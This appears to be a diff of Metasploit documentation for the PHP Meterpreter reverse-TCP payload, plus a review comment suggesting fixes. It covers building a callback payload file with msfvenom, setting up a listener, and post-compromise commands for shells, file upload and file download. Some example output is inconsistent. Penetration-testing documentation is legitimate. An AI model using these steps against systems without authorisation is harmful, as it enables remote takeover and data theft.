| 1 | +The php/meterpreter/reverse_tcp is a staged payload used to gain meterpreter access to a compromised system. This is a unique payload in the Metasploit Framework because this payload is one of the only payloads that are used in RFI vulnerabilities in web apps. This module _can_ be cross platform, but the target needs to be able to run php code. |
| 2 | + |
| 3 | + |
| 4 | +## Vulnerable Application |
| 5 | + |
| 6 | + The PHP Meterpreter is suitable for any system that supports PHP. For example, the module can be used against webservers which run PHP code for a website. OS X has PHP installed by default. |
| 7 | + |
| 8 | +## Deploying php/meterpreter/reverse_tcp |
| 9 | +### Scenarios |
| 10 | + |
| 11 | + Specific demo of using the module that might be useful in a real world scenario. |
| 12 | + |
| 13 | +#### Generating a file with msfvenom |
| 14 | + ``` |
| 15 | + msfvenom -p php/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o evil.php |
| 16 | + ``` |
| 17 | + |
| 18 | + |
| 19 | +#### Starting a listener |
| 20 | + ``` |
| 21 | +msf > use multi/handler |
| 22 | +msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp |
| 23 | +PAYLOAD => php/meterpreter/reverse_tcp |
| 24 | +msf exploit(handler) > set LHOST [IP] |
| 25 | + ``` |
| 26 | + |
| 27 | +## Important Basic Commands |
| 28 | + |
| 29 | +Compared to a native Meterpreter such as windows/meterpreter/reverse_tcp, the PHP Meterpreter |
| 30 | +has less commands, but here's a list of all the common ones you might need: |
| 31 | + |
| 32 | +**pwd command** |
| 33 | + |
| 34 | +The ```pwd``` command tells you the current working directory. For example: |
| 35 | + |
| 36 | +``` |
| 37 | +meterpreter > pwd |
| 38 | +/Users/thecarterb/Desktop |
| 39 | +``` |
| 40 | + |
| 41 | +**cd command** |
| 42 | + |
| 43 | +The ```cd``` command allows you to change directories. Example: |
| 44 | + |
| 45 | +``` |
| 46 | +meterpreter > cd /Users/thecarterb/Desktop |
| 47 | +meterpreter > pwd |
| 48 | +/Users/thecarterb/Desktop |
| 49 | +``` |
| 50 | + |
| 51 | +**cat command** |
| 52 | + |
| 53 | +The ```cat``` command allows you to see the content of a file: |
| 54 | + |
| 55 | +``` |
| 56 | +meterpreter > cat /tmp/data.txt |
| 57 | +Hello World! |
| 58 | +``` |
| 59 | + |
| 60 | +**upload command** |
| 61 | + |
| 62 | +The ```upload``` command allows you to upload a file to the remote target. This is useful for uploading additional payload files. For example: |
| 63 | + |
| 64 | +``` |
| 65 | +meterpreter > upload /tmp/data.txt /Users/thecarterb/Desktop |
| 66 | +[*] uploading : /tmp/data.txt -> /Users/thecarterb/Desktop |
| 67 | +[*] uploaded : /tmp/data.txt -> /Users/thecarterb/Desktop/data.txt |
| 68 | +meterpreter > |
| 69 | +``` |
| 70 | + |
| 71 | +**download command** |
| 72 | + |
| 73 | +The ```download``` command allows you to download a file from the remote target to your machine. |
| 74 | +For example: |
| 75 | + |
| 76 | +``` |
| 77 | +meterpreter > download /Users/thecarterb/Desktop/data.txt /tmp/pass.txt |
| 78 | +[*] downloading: /Users/thecarterb/Desktop/data.txt -> /tmp/pass.txt/data.txt |
| 79 | +[*] download : /Users/thecarterb/Desktop/data.txt -> /tmp/pass.txt/data.txt |
| 80 | +meterpreter > |
| 81 | +``` |
| 82 | + |
| 83 | +**search command** |
| 84 | + |
| 85 | +The ```search``` command allows you to find files on the remote file system. For example, |
| 86 | +this shows how to find all text files in the current directory: |
| 87 | + |
| 88 | +``` |
| 89 | +meterpreter > search -d . -f *.txt |
| 90 | +Found 2 results... |
| 91 | + .\pass.txt (13 bytes) |
| 92 | + ./creds\data.txt (83 bytes) |
| 93 | +meterpreter > |
| 94 | +``` |
| 95 | + |
| 96 | +Without the ```-d``` option, the command will attempt to search in all drives. |
| 97 | + |
| 98 | +The ```-r``` option for the command allows you to search recursively. |
| 99 | + |
| 100 | + |
| 101 | +**getuid command** |
| 102 | + |
| 103 | +The ```getuid``` command tells you the current user that Meterpreter is running on. For example: |
| 104 | + |
| 105 | +``` |
| 106 | +meterpreter > getuid |
| 107 | +Server username: root |
| 108 | +``` |
| 109 | + |
| 110 | +**execute command** |
| 111 | + |
| 112 | +The ```execute``` command allows you to execute a command or file on the remote machine. |
| 113 | + |
| 114 | +The following examples uses the command to create a text file: |
| 115 | + |
| 116 | +``` |
| 117 | +meterpreter > execute -f echo -a "hello > /tmp/hello.txt" |
| 118 | +Process 73642 created. |
| 119 | +meterpreter > |
| 120 | +``` |
| 121 | + |
| 122 | +**ps command** |
| 123 | + |
| 124 | +The ```ps``` command lists the running processes on the remote machine. |
| 125 | + |
| 126 | +**shell command** |
| 127 | + |
| 128 | +The ```shell``` command allows you to interact with the remote machine's command prompt (or shell). |
| 129 | +For example: |
| 130 | + |
| 131 | +``` |
| 132 | +meterpreter > shell |
| 133 | +Process 74513 created. |
| 134 | +Channel 2 created. |
| 135 | +sh-3.2# |
| 136 | +``` |
| 137 | + |
| 138 | +If you wish to get back to Meterpreter, do [CTRL]+[Z] to background the channel. |
| 139 | + |
| 140 | +**sysinfo** |
| 141 | + |
| 142 | +The ```sysinfo``` command shows you basic information about the remote machine. Such as: |
| 143 | + |
| 144 | +* Computer name |
| 145 | +* OS name |
| 146 | +* Architecture |
| 147 | +* Meterpreter type |
| 148 | + |
| 149 | +## Using `post` modules |
| 150 | +When using the PHP Meterpreter, you have the feature of using Metasploit's `post` modules on that specific session. By default, most `multi` post modules will work; however, you can also use OS specific modules depending on the OS of the compromised system. For example, if you have a PHP Meterpreter session running on OS X, you can use `osx` post modules on that session. |
| 151 | + |
| 152 | + __Don't forget to:__ |
| 153 | + - Set the `LHOST` datastore option to the connect-back IP Address |
| 154 | + - If you want to get multiple shells, set `ExitOnSession` to `false` |
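Review bot: the "Starting a listener" block configures `multi/handler` but never starts it, and it leaves `LPORT` unset even though the msfvenom command under "Generating a file with msfvenom" pins `LPORT=4444`; add `msf exploit(handler) > set LPORT 4444` and close with `msf exploit(handler) > exploit -j` (or `run`) so the walkthrough ends with a handler that is actually listening on the port the payload was built for (running it as a job with `-j` also fits the closing checklist's advice to set `ExitOnSession` to `false` for multiple shells). In the `download` example the destination is given as `/tmp/pass.txt`, yet the output shows the file landing at `/tmp/pass.txt/data.txt`, which only makes sense if `pass.txt` is a directory; use a directory destination such as `/tmp/` or rename it so readers are not misled about how the destination argument is interpreted. The `execute` example ends at `Process 73642 created.` with nothing showing that `/tmp/hello.txt` was written; follow it with `meterpreter > cat /tmp/hello.txt` so the reader can see whether the shell redirection was honoured rather than echoed literally. The `search` output mixes `.\pass.txt` with `./creds\data.txt`, which looks like two listings pasted together; re-capture it from a single run. Wording nits: "one of the only payloads that are used in RFI vulnerabilities" reads awkwardly (this is a payload, not a module, so "This module _can_ be cross platform" should say "This payload"), "has less commands" should be "has fewer commands", "the current user that Meterpreter is running on" should be "running as", and "The following examples uses" should be "The following example uses".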